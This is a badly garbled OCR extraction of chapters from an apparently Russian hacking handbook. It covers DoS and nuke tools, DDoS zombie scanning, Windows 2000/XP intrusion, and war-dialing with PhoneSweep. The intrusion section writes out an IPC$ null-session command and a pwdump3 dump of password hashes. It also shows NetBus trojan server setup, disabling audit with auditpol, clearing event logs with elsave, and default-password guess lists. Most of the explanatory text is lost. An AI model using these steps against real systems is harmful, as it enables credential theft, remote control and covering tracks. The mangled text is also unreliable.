> UDP Flooder 2.O.
IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5.
> Port () , 80, HTTP-.
145
UDP Flondfir 2
IP: 1.0.0.1
^ __. 11011
.
Port [30
II
^Infinite] |
min
max
Speed (pkts/sec)
[-[
| 250 |
~"V
Random
Text
|
| Go
Packets sent
903
Seconds elapsed
20.299
Stop
Adapter Name
[[Processes: 39
I Network Utilization I
Link Speed I
10 Mbps
Operatic
Puc. 9.2.
80%
DoS
, -
UDP, 50%
. - ,
LAN Ethernet I DBase.
4>) ICMP
( ) ICMP (Internet Control Message Protocol -
)
UDP. . 9.3 X-Script ICMP
Bomber.
pt ICMP Bomber vO 3 By Code
Host |1.0.0.5
Packet Size: h ooOOO
\ NumberToSenchhooo
147
Options
View
Help
Processes: 38
||CPU Usage: 5%
Aht3K3 Smurf
, , ,
DoS ? Smurf, .
, , Smurf
. ECHO () ICMP,
. IP- ,
. , , -
10 , .
, DoS, DDoS (Distributed DoS). DDoS -, .
, ,
148
DoS
DoS . DDoS WinTrinoo (
http://www.bindview.com), , , DDoS Win32. 2000 DDoS
, Web- (, , , WinTrinoo).
- Foundstone , ,
DoS.
DoS, , , , , . , , DoS,
,
. , .
DoS
PortFuck, ( TCP- , ). PortFuck - TCP- , . ,
,
, TCP- ,
, , .
. 9.5 PortFuck.
!.f: PortFuck 1.02 PRIVATE BUILD
Host: localhost
START
Help?
Port:
Reconnect on Disconnect
Delay (MS): |1 000
[Ready.
NICI
PA
Socks: [5
Nuke
Nuke ,
DoS, , , -, .
- , . TCP/IP
ICMP, ICMP .
- -
, .. - ICMP, , ,
. ,
.
- - ,
, , ,
.
Web-, , . Nuke -
.
DoS Nuke , ,
Windows 2000/XP ,
Windows 9x.
Windows 2000/XP,
(, [4]). ,
Windows 9x,
, .
,
.
Nuke - , . ,
Windows Nuke'eM version 1.1, . 9.8.
Nuke , - Alex-2, IP- 1.0.0.4
Windows 95. .
> Address () Windows Nuke'eM version 1.1,
. 9.8, IP-
Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000).
- Add ()
.
152
DoS
\"\ Eort [
Address [1.0,0,7
1.0.0.4
1.0.0.5
1.0.0.7
lext [Testing 1 2 3
JDelay
ft
Add
| |Remove! |
Help
Execute
Dong
Puc. 9.8.
>
Help
MEot|l39
1.0.0.4 {Nuked}
1.0.0.5 {Connect error}
1.0.0.7 {Connect error}
lexl |Testing 1 2 3
Delay |o
|
^ Q Close after execution
Add
| | Remove | |
Help
| 1
Execute
153
- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable:
Datagram Too Big ( : ).
, ICMP DoS , , , , ,
,
.
, , DoS,
TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP-
NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send.
, nbname
- , nbname, ,
nbname.
DoS - ,
. ,
, , . , [11] , , DoS, , , Web- .
, Web-. - , DoS.
DDoS - , , , , ,
156
DoS
-. , Foundstone.
,
, .. , 1 , Foundstone .
DDoS, , Foundstone .
Foundstone,
(Robin Keir),
http://www.foundstone.com DDoSPing 2.0,
-. ,
UDP, UDP .
. 9.11 DDosPing 2.0, .
-Target IP address range Start IP address
|1.Q.Q.5|
End IP address
h.OO 5
Slop
-o-
Speed (pkts/sec)
I 181
Modem>-Cable>T1 >LAN
-Infected Hosts-
- Status Current IP
Packets sent
Time elapsed
Zombies detected
ne /,
1.0.0.5
3
00:00:00
0
Save List
Configuration
Affp://i
. 9.11. DDoS
DDoSPing 2.0 .
> Start IP address ( IP-) End IP-address (
-) IP- .
157
> Speed () , , LAN.
> , Configuration () . 9.12).
Enable
[34555
"Ping" command
|pngQ..KsH4
Expected reply
(PONG
Windows defaults
|
UNIX defaults
I
i
0 Enable
SendlCMPID
[668
"Ping" commend
Jgesundheit!
Expected reply
|sicken\n
P^ceivelCMPID [69
I
I
0 Enable
SendlCMPID
"Ping" command
[?89
Receive ICMP ID [
~ """"
Show UDP transmit errors
Max run duration (sees)
[O
Cancel
I (Qforev@r)
times
| OK
'
. 9.12.
> , Windows defaults
(Windows ) Unix defaults (Unix ), Windows Unix, .
> , DDoSPing 2.0 , WinTrinoo, ,
- StachelDraht Tribe Flood Network. ,
(. 9.12).
> DDoSPing 2.0 . 9.11 Start () . Infected Hosts ( ).
, -
Zombie Zapper (http://razor.bindview.com/tools/
ZombieZapper__form.shtml), WinTrinoo.
. 9.13 , , ,
DDoSPing 2.O.
158
DoS
Target(s)
Target IP:
| input IMs...
0 Trinoo
UDP source
|53
[ T o I Repeats (1-300)
Zap
Exit
, , , DoS - , , 1 . , , - ,
, - Web- - .
- , , ,
, ,
. DoS
, -
(-, , )
Web-.
IP- ICMP-!
EDS DP-, , , ,
Web. , - , .
DoS , -
- !
159
10.
Windows ZOOO/Xf
, , - () ,
, - , ( , , [1]).
, , , -
-
. ,
.
?
TCP/IP, . TCP/IP . .
1 ,
. - , , [11].
, , , .
1, ,
- .
cemu*TCf/lf
IP- ,
ping
, W2RK (Windows 2000 Resource Pack).
- ICMP (Internet Control Message Protocol -
). . . 10.1 ping Sword-2000.
Windows 2000/XP
\ Command Prompt
fron
fron
fron
fron
1.0.0.1:
1.0.0.1:
1.0.0.1:
1.0.0.1:
bytes=32
bytes=32
bytes=32
bytes=32
tine<lns
tine<lns
time<lns
time<lns
TIL=128
TTL=128
TTL=128
TTL-128
Resolved |SWORD-20]0
Resolve hostnames
0 Only scan responsrve ping
0 Show host responses
Ping only
Every port in list
0 Ignore IP zero
0 Ignore IP 255
Extract from file
M Active ho
Open ports
161
6 - 5830
- ,
, [3].
SuperScan (http://www.foundstone.com),
(. . 10.2).
. 10.2 IP-
1.0.0.1-1.0.0.7. ,
Sword-2000,
- TCP- 139 NetBIOS. ,
- .
, , , . Windows NT/2000/XP -
NetBIOS 139.
&
Windows NT/2000, .
. Windows NT/2000/XP
.
net use\\1.0.0.1\IPC$ "" /user: ""
1.0.0.1 - IP- Sword-2000, IPC$ -
Inter-Process Communication -
( ), ""
, /user:"" .
, , .
, SMB (Server Message
Block - ). ,
.
162
Windows 2000/XP
,
;
.
Alex- ( Windows XP)
Sword-2000 ( Windows 2000).
Sword-2000 Alex- - , Windows XP
Windows 2000,
, , .
Windows NT/2000/XP. net view nbtstat W2RK. net view .
C:\>net view /domain
SWORD
.
SWORD. , .
C:\>net view /domain:SWORD
\\ALEX-3
\\SWORD-2000
.
Sword-2000 .
nbtstat; . 10.3.
. 10.3 ,
NetBIOS, NetBIOS. ,
<00> , <00>
- . <03> , ,
<03> - , Administrator. MSBROWSE, <1 >
SWORD.
163
Command Prompt
C:4Documents and SettingsSfllex>nbtstat - 1..0.1
SllORD-2000
<00>
SUORD-2000
<20>
SUORD
<Q0>
SWORD
<1C>
SWORD
<1B>
SWORD
<1E>
SUORD-2000
<03>
SUORD
<1D>
MSBROWSE
<01>
INet~Seruices <1C>
IS~SWORD-2Q00..<00>
ADMINISTRATOR <03>
UNIQUE
UNIQUE
GROUP
GROUP
UNIQUE
GROUP
UNIQUE
UNIQUE
GROUP
GROUP
UNIQUE
UNIQUE
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
flddress - S2-54-AB-14-5S-B4
id Settings\fllex>nbtst
Sviord:
Node Ipflddress: 11..0.5] Scope Id: I I
NetBIOS Remote Machine Nane Table
SUORD-20QQ
SUORD-2Q00
SUORD
SUORD
SUORD
SUORD
SWORD-20QGI
SUORD
MSBROUSE_
INef"Seruices
IS-SUORD-2000.
flDMINISlllfllOR
Registered
Registered
Registered
Registered
Registered
Registered
Registere
Registerei
Registered
Registered
52-54-flB-14-S5-B4
164
Windows 2000/XP
, pwdump3.exe Windows NT/2000/XP LC4
.
, NetBIOS TCP/IP
( Windows 2000/XP )? , , SNMP (Simple
Network Management Protocol - ), Windows NT/2000/XP. , SNMP, , , [11].
, , ,
.
Windows NT/2000/XP .
, .
,
, , .
- , ..
, . nbtstat MIB,
- , (. [3] [4]). ,
, . ,
.
D:\>net use \\1.0.0.1\1$ * /u:Administrator
* ,
IPC$ Administrator.
:
Type password for \\1.0.0.1\IPC$:
. ,
- 165
, , ,
. , , , SMBGrind, CyberCop Scanner Network Associates. (
[3]).
- .
, , , .
Windows NT/2000/XP , SAM (Security Account Manager - ). SAM
(, , ) ,
, ,
. ,
- , , , , .
,
SAM, LC4 ( LOphtcrack,
- LC4) (http://www.atstake.com/research/redirect.html), .
Samdump - SAM.
Pwdump - , . Syskey SAM ( Syskey . 2).
Pwdump2 - , Syskey.
.
Pwdump3 - , Pwdump2, .
Syskey, 2; ,
SAM,
Windows 2000/XP , Windows NT
.
2 , , , .
Sword-2000
PwdimpS, :
C:\>pwdump3 sword-2000 > password.psw
166
Windows 2000/XP
Sword-2000,
password.psw.
(Notepad) (. 10.5).
sword.psw - Notepad
File
Edit
Format
Help
\dministator: SOO:7A01665EB2B6C14AAD3B435B51404EE:OB0412D8761239A73143EFAE928E9FO
A:::
Guest:501 :NO PASSWORD*"'
:NO PASSWORD
*
:::
krbtgt:S02:NO PASSWORD
'
:7BD70B6AF1C3909E006426SFE207B256:::
Alex:1110:7A01665EB2EB6C14MD3B43SB51404EE:OB0412D8761239A73143EFAE92eE9FOA;::
Alex-1:1113:7A01665EB2EB6C1<tAAD3B<!35BSl404EE:OB0412D6761239A73143EFAE92SE9FOA:::
TslnternelUssr: 1114:BAD7DFC9A31GED47F7B4B3B5S224FE93:C 7BD9SEOEBB6 EFS1646447
5CFO:::
USR_SWORD-2000:inS:3C28F57EAAF6DF9E1A6F22062Ali83BE:6FDDA84130F3FOS7F762F24l4IM
B235686:::
WAM SWORD-2000:1116:ED30C29CC83326F4A5CF20S94A603490:CA9469SBOCF3440C09302SC !
B028B6E2C:::
SWORD.2000J:100S:NO
'AS5WORD""""""""":3942CE20E6A112963BAeF7DC9BC34D07:::
ALEX-3$:1109:NO PASSWORD""
"""""":B6B19C13A34F6BD42S4C0199ES1F12A6:::
ALEX-1$:1112:NO PASSWORD'""
"
:B7D4SA21709B0869751E609477D7266F:::
Puc. 10.5.
Sword-2000
, password.psw Administrator,
. , LC4, , ,
Sword-2000 (. 10.6).
Administrator
Guest
krbtgt
Alex
Alex-1
TslnternetUser
IUSR_SWORD-2.
IWAM_SWORD-2.
SWORD-2000S
ALEX-3S
ALEX-IS
missing
* missing *
* missing *
Puc. 10.6. ,
Sword-2000
Celeron 1000 , 007
. 167
,
LC4.
, , -
NetBIOS - , , .
, .
, - ,
, . -
, .
- ,
. , .
Invisible Key Logger Stealth (IKS) (http://www.amecisco.com/iksnt.htm),
3 . IKS -
,
.
- , ..,
, NetBus (http://www.netbus.org)
2 (Back Orifice 2000) (http://www.bo2k.com),
.
NetBus 2 - [3].
,
. ,
, , . - ,
, -
, ,
.
,
NetBus, cDc (Cult of the Dead
Cow - ).
168
Windows 2000/XP
NetBus - , ..
, , , ,
, . ,
, . - ,
. , ,
- , . 1% NB Server [Off] 1
NetBus
: -
Sword-2000 (- 1.0.0.1), -
Alex-3 (IP- 1.0.0.5).
.
NetBus
, NBSvr (
).
NBSvr , . 10.7.
|[ Settings
HI
i| |
Close
l> />
Puc. 10.7.
NetBus
NetBus NBSvr .
.
> NB Server ( NB) Settings ().
Server Setup ( ), . 10.8.
Server setup
Accept cor
Run on port:
|4
Password:
1 \r
Visibility of st rver:
JsO
1 Fully visible
Access mod :
[Full access
Cancel
Accept connections ( ).
169
> Password () NetBus.
> Visibility of server ( )
Full visible ( ),
NetBus ( ).
> Access mode ( ) Full access ( ), Sword-2000 .
> Autostart every Windows session ( Windows),
.
> . .
- NetBus.exe.
> NetBus.exe, NetBus 2.0 Pro,
. 10.9.
. 10.9. NetBus
Host Neighborhood * Local ( *
). Network (), . 10.10.
Microsoft Windows (Microsoft Windows Network)
(. 10.11).
NetBus,
Sword-2000, Add (). Add Host ( ), . 10.12.
170
Windows 2000/XP
Network
Network neighbourhood
Network neighbourhood
Microsoft Windows
Add.,
I [I |_
Add...
Close
. 10.11.
Puc. 10.10.
NetBus
Destination: |Sw6RD-200d
1
20034|
ft
OK
Cancel
171
KNetBus 2.0 Pro
Destination
ysworaxzcggj
I Host
My computer
Message managei
DesUnatiorldJ File manager
ISWORI
Window managei
0.0.1
'7.0.0.1
Si Sound system
^J Plugin managei
Port redirect
(f* Application redirect
Remote control
[f^-j File actions
V Spy functions
Cannot conne
Enil Windows
172
Windows 2000/XP
! Sword-2000,
Windows,
.
, NetBus,
IKS,
. IIS (. 8), ,
. (
).
, ,
, -
, .
, / .
, . ,
, auditpol.exe W2RK. ( ) ,
.
.
C:\Auditpol>auditpol \\sword-2000 /disable
:
RunningAudit information changed successfully on \\sword-2000...
New audit policy on \\sword-2000...
(0) Audit Disabled
System
= No
Logon
= No
Object Access
= No
Privilege Use
= No
Process Tracking
= Success and Failure
Policy Change
= No
Account Management
= No
Directory Service Access
= No
Account Logon
= No
173
\\sword-2000 - , /disable
. auditpol.exe -
, ,
, , .
, auditpol /?,
. ,
/ SAM,
pwdump3.exe
SAM.
Windows 2000/XP,
( , ).
.
> (Start)
(Settings * Control Panel).
>
(Administrative Tools).
>
(Computer Management). .
>
Windows 2000/XP
Windows 2000.
.
C:\els004>elsave -s \\sword-2000 -
-s , -
. , . ( elsave /? ,
).
, -
elsave.exe
,
(Computer Management).
? ( ) W2RK, SAM,
. .
.
- .
, , ,
. Windows
( , , , [7]). Windows, IDS.
, IDS, , IP-
(, BlacklCE Defender). , ,
, -
..
175
11.
, , . , ,
, (
, ), - , , . ,
- .
- , , .
, ,
, - ,
. -- -
- , ! , , - , , .
, , . , , - , ,
, .
- , -
Login Hacker, , THN-Scan (http://www.infowar.co.uk/thc/) ToneLock
Minor Threat&Mucho Maas.
, DOS,
.
, (
) - PhoneSweep
(http://www.sandstorm.com) Sandstorm. ,
, ,
, . PhoneSweep,
- , Sandstorm.
- PhoneSweep , , .
, PhoneSweep, , , , - , . , , , ,
, , ,
. - , , ,
.
- , . , ,
. , . Whols (, http://www.ripe.net). Whols , , , - .
- -
.
, ,
.
,
, . , ,
- ,
, .
- -
177
, , ,
.
, - . , PhoneSweep
,
(, ).
fhoneSweep .
PhoneSweep - , .
, - .
-
Windows.
PhoneSweep . PhoneSweep .
Windows 95/98/NT/2000/XP.
.
/
(Point-to-Point protocol - ).
.
, 1 4.
, .
PhoneSweep.
178
fttoneSweep
PhoneSweep Demo , -.
(. 11.1).
This is a demonstration version of Sandstorm
Enterprises' PhoneSweep (tm)telephone
scanning application. The demonstration version
will NOT actually test computer system securiv
on telephone networks. It may be used and
distributed freely, provided that neither the
program nor its components are modified, and
that Sandstorm's copyright remains intact.
End User License Agreement
Sandstorm Enterprises Inc. ("Sandstorm") and/or
its suppliers own these programs and their
documentation, which are protected under
applicable copyright laws. Your right to use the
programs and the documentation is limited to the
terms and conditions described below.
1. Licens e: YOU MAY: (a) use the enclosed
programs one single computer; (to) physically
transfer the programs from one computer to
another; (c) make a copy of the programs for
| [Accept | | I Decline | | Copy to Clipboard |
i- Load Profile _^^^^^^^
I New
Current
Select From List
179
MMol
rnlhost - DEFAULT
File View Help
>. ru
6*
Dist
Ik?
4%
Prefix V | Number
%555-00
[A | Time | r,
[Result
|-Qf System ID
|l
Add
, (
).
Start (). ; Start (), ,
180
. 11.3, . , Default ,
Setup ().
|t*51 PhoneSweep 4 4 Demo - localhost - DEFAULT
file View Help
Seve
6*
&
Revert Default
Dist
Whet's this?
Start Now
J Schedule Start...
History
me
Setup
[Modem
[Result
j-U| System ID
ji
Schedule Stop...
Cancel Scheduled Slop
IOEFAULT
1
|
OK
||
Cancel |
PMC. 77.4.
Save (). ,
.
181
Revert (). ,
, .
Default ( ). .
Import ().
/ bruteforce.txt.
Export (). ( ),
.
Report (). , , .
Graph ().
( Excel 2000).
What's This? ( ). ,
PhoneSweep 4.4 Demo - .
PhoneSweep 4.4 Demo
(. 11.5) ,
.
, Profiles
(), Setup (), . 11.3.
Open (). .
^ Profiles () . 11.5.
New profile ( ). . Profiles () . 11.5.
Copy profile ( ).
( ).
Profiles () . 11.5.
182
>.
Start Stop
Rescan
Save
Rawert Default
Graph
Disi
n?
What's this?
Open
New
E
Copy
Delete
Puc. 11.5.
Profiles ()
Delete (). .
Profiles () . 11.5.
Save (). ,
, . Profiles ()
. 11.5.
Undo (). . Profiles ()
. 11.5.
Freeze (). History
() .
Freeze () Thaw (). Freeze ()
History () . 11.6.
Thaw (). History ().
History () . 11.6.
Clear (). . History () Phone Numbers (
) . 11.6.
183
File View Help
Start
Stop
Rescen
II
Phone Numbers [| Results | Status [ History [Setup
[Modem
200M3-2PJJJ47
:
20-03 2011:47"
2003-03-2011:16
[Number
?BM003_
"555-2004 '
|-a|SystemlD
[Result
| User ID
_NO,FACSIMILE
_____
II
Freeze
Clear
[idle
:
Note:
! Business Outside
Weekend | All |
51
. 11.7.
Delete ().
.
Add/Save (/).
, Add Phone Numbers ( ).
184
PhoneSweep
. ,
. ,
,
.
Sweeping Indicator ( ) - ,
.
Scheduled Start On/Off ( /) - ,
( ,
).
Scheduled Start Time ( ) - OFF.
Scheduled Stop On/Off ( /) - ,
( ,
).
Scheduled Stop Time ( ) - OFF.
Effort level ( ) - - , , .
Phonenumbers to Dial ( ) - , . , .
Report Status ( ) - ,
, ; - ;
- .
Time Period ( ) - - , , .
Remote Access Indicator ( ) - , PhoneSweep
. , .
-
PhoneSweep , .
185
fadoma flioneSweep
PhoneSweep, .
> PhoneSweep Setup (), . 11.5 .
> Phone Numbers ( ),
. 11.2, , Add (), Add
Phone Numbers ( ), . 11.7,
.
> PhoneSweep Start ()
.
, ,
(dialing riles).
&
PhoneSweep , ,
.
PhoneSweep, , , , -
.
, PhoneSweep
.
.
Add Phone Numbers ( ) (. 11.7)
: Business (), Outside (), Weekend
().
PhoneSweep ,
, , , .
186
Time (), Setup (), . 11.8.
||
File View Help
i~~&~~~*
>.
it
s1
Dist
What's this?
III!
| 7%
00
E!s
3 Seconds
10
'
or 92
Weekend:
10
or |92
1+41111
PMC. 77.5.
Effort () . 11.9.
] PhoneSweep 4 4 Demo - localhost - DEFAULT
File View Help
X
N?
What's this?
1111
Ehone Numbers |j Besults |i Status^ Histoiy J Setyp |_
Proges ][Modgini^| IlmeJ Eton [ ginlirig | Remale_
Current Effort Level:
Connectto answering phone numbers
then disconnect immediately.
Set Level:
Connect
Scan For:
Modems Only
3
Username
root
(Password
password
root
syzygy
guess
123
Puc. 11.9.
. 11.9, ,
. Set Level ( ) ,
( Connect ()),
( Identity
()), (
Penetrate ()). Scan For () / ,
(, , , ?).
Penetrate Level Options ( )
, ..
. Maximum Guesses Per Username Per Day ( )
() . , ,
- . ,
,
188
Maximum Calls
Per Number Per Day ( ).
/, ,
bruteforce.txt,
Effort (), . 11.9. , Add () Del ().
/
Recycle Names ( ). Recycle Names (
) PhoneSweep
/ ,
/.
, Find Modems First ( ) PhoneSweep
.
.
PhoneSweep , /. .
bruteforce.txt: /,
PhoneSweep . brutecreate.exe,
/ bruteforce.txt.
systemdefault.txt: /,
.
( )
bruteforce.txt.
largebrute.txt: ,
.
largebruteback.txt: ,
largebrute.txt, .
, PhoneSweep ,
. - ! , ,
, PhoneSweep 1000$, ,
2800$ 2002 , - PhoneSweep . ! - , , -
189
, PhoneSweep - ,
, .
- THN-Scan ToneLock
,
. , - Login Hacker (
, , [3]). ,
, ...
- -
.
, , TeleSweep Secure
(http://www.securelogix.com) Secure Logix.OdnaKO, [14], TeleSweep Secure
- , .
, , - .
-
.
, , , - ,
.
PhoneSweep -
, ,
, , . PhoneSweep
, , - .
, , , .
190
1. 2000-2003 .
2.
.. - .: -, 2001. - 624 .: .
3.
- ., ., . . , 2- .: . . - .: ,
2001.- 656 .: . - . . .
4. - ., ., . . Windows
2000 - .; . . - .: ,
2002.- 264 .: . - . . .
5.
. .
. - 560 . - .: ,
2002.- ( ).
6. . . Windows 2000.:
Windows 2000.: . . - .: , 2001. - 592
.: . - . . .
7.
Alex JeDaev . - .:
, 2002 - 432 .: .
8.
9.
.. .: . . - .: +, .:
, .: -, 2001.- 272 .
10. . .
- .: ,
2000. - 736 .
11. ., . . Web- .; . . - .: , 2003.384 .: . - . . .
.;
'
'
12. . , . .
- .: . 2002. - 848 .: .
13. - , .
14. - ., ., . . , 3- .: . . - .: ,
2002.- 736 .: . - . . .
( , , , - 3000, 25 )
, Alex Atsctoy.
.
.. .
.. .
. 125438, . , / 18.
00033 10.08.99 .
- 12.01.2005 .
70100'/|- . . . 12.
5830.
3 500 .
143200, . , . , 93
www.3st.ru
ISBN 5 - 9 3 6 7 3 - 0 3 6 - 0
8.
"I
"7 8 5 93 6 "73 03 68 I
: (095) 720 07 65
<=>?
SSI
os-
S 3
i!
t.
E-mail: opt@triumph.ru